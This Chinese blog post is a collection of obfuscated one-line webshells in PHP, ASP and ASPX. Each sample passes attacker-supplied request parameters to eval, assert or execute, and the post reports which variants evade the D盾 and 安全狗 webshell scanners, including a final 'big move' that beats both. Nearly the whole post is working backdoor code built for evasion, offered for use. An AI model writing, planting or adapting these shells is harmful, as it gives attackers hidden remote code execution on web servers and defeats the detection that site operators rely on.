20 02 2020

最近在网上总结了一份比较新的免杀一句话木马
因为图片比较多就不上传了,PHP的免杀脚本是测试过可以用的。

Php

  • str_rot13函数:
    来替代assert。该函数对字符串执行ROT13编码。ROT13编码就是把每个字母在字母表中移动13位。
<?php
function xiaoma($a){
    $c=str_rot13('nffreg');
    $c($a);
}
xiaoma($_REQUEST['xxx']);
?>

检测结果
1578716842866.png
没绕过D盾
1578716990532.png
再次修改

<?php
class One{
    function xiaoma($x){
    $c=str_rot13('n!ff!re!nffreg');
    $str=explode('!',$c)[3];
    $str($x);
    }
}
$test=new One();
$test->xiaoma($_REQUEST['x']);
?>

再次修改,加了explode函数分割字符串,class封装类。可绕过D盾。
1578717036675.png

  • array_map函数:
    array_map() 函数将函数作用到数组中的每个值上,并返回一个新的数组。
<?php
$a1=array("1234","123456");
$a2=array(@$_REQUEST['x'],"1234");
$a=array_map(null,$a1,$a2)[0][4];
assert($a);
?>

可绕过一般查杀工具
1578717072295.png
但绕不过D盾
1578717092332.png
可绕过安全狗
1578717110827.png

  • array_key函数:
    array_key() 函数也是返回包含数组的一个新数组。
<?php
$a=array($_REQUEST['x']=>"3");
$b=array_keys($a)[0];
eval($b);
?>

索引数组变化为关联数组。
绕不过D盾,但危险级别很低,可能会有运气成分绕过安全狗绕过普通查杀工具

  • preg_replace函数
    用来正则匹配的一个函数。
<?php
function func(){
  return $_REQUEST['x'];
}
preg_replace("/test/e",func(),"i am test");
?>

/e用来当做php代码解析。5.6版本以下实用。 测试可绕过安全狗和D盾。

  • preg_filter函数:
    根据preg_replace修改为preg_filter函数,也是用来执行正则的匹配替换。
<?php
$a=preg_filter('/\s+/','','as s er t');
$a($_REQUEST['x']);
?>

绕不过D盾,但危险级别很低可绕过安全狗

<?php $fun = $_REQUEST['fun'];$arr = array('xlion'=>1,$_REQUEST['req']=>2);uksort($arr,$fun);?>

可绕过安全狗,绕不过D盾

<?php 
    $fun = base64_decode($_REQUEST['fun']);
    $arr = array(base64_decode($_POST['code']));
    $arr2 = array(1);
    array_udiff($arr,$arr2,$fun);
?>

绕过安全狗,绕不过D盾

最后上大招,都可以绕过安全狗和D盾

<?php
class XBZO{
    function __destruct(){
        $DQYB='~DclQ$'^"\x1f\x37\x10\x9\x23\x50";
        return @$DQYB("$this->BMHI");
    }
}
$xbzo=new XBZO();
@$xbzo->BMHI=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];
?>

ASP

其它几乎所有的ASP木马脚本,只要在上面提到的正确位置插入了<!--"-->、' %>
字符串,都可以绕过D盾的检测。
<%

<!--"-->

execute request("LandGrey")

%>
但绕不过安全狗
<%
' %>
EXECUTE REQUEST("ASD")
%>

Class LandGrey

  Private Sub Class_Initialize

    eval    (request("LandGrey"))

  End Sub

End Class

 

Set X = New LandGrey

%>

 

<%

Class LandGrey

  Private Sub class_terminate

    eval    (request("LandGrey"))

  End Sub

End Class

 

Set X = New LandGrey

Set X = Nothing

%>

可绕过D盾和安全狗

<%<!--"-->

eXecUTe(fun("%167%184%163%174%98%180%167%179%183%167%181%182%106%100%142%163%176%166%137%180%167%187%100%107"))

 

Function fun(Str):

    Str = Split(Str,"%")

    For x=1 To Ubound(Str)

        fun=fun&Chr(Str(x)-66)

    Next

End Function

%>

同样可以绕过安全狗和D盾

ASPX

<%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/14254250/*-/*-*/-/*-/*-*/102425454/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval (/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/); /*gadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenre*/ %>

绕过D盾也绕过安全狗

绕过waf的原理https://cloud.tencent.com/developer/news/116802

延伸阅读
  1. Access数据库防注入系统拿实战shell
  2. 对菠菜站的被动信息收集
  3. 攀登计划项目《MRSAC的安全性分析》
  4. Kerberos网络身份认证协议
  5. 黑客技术总结
  6. 反弹shell总结(附实战反弹shell)
  7. 常见解析漏洞总结
  8. SQL注入绕过姿势总结
更多阅读
  1. 上一篇:SQL注入绕过姿势总结
  2. 下一篇:常见解析漏洞总结
发表评论 抢沙发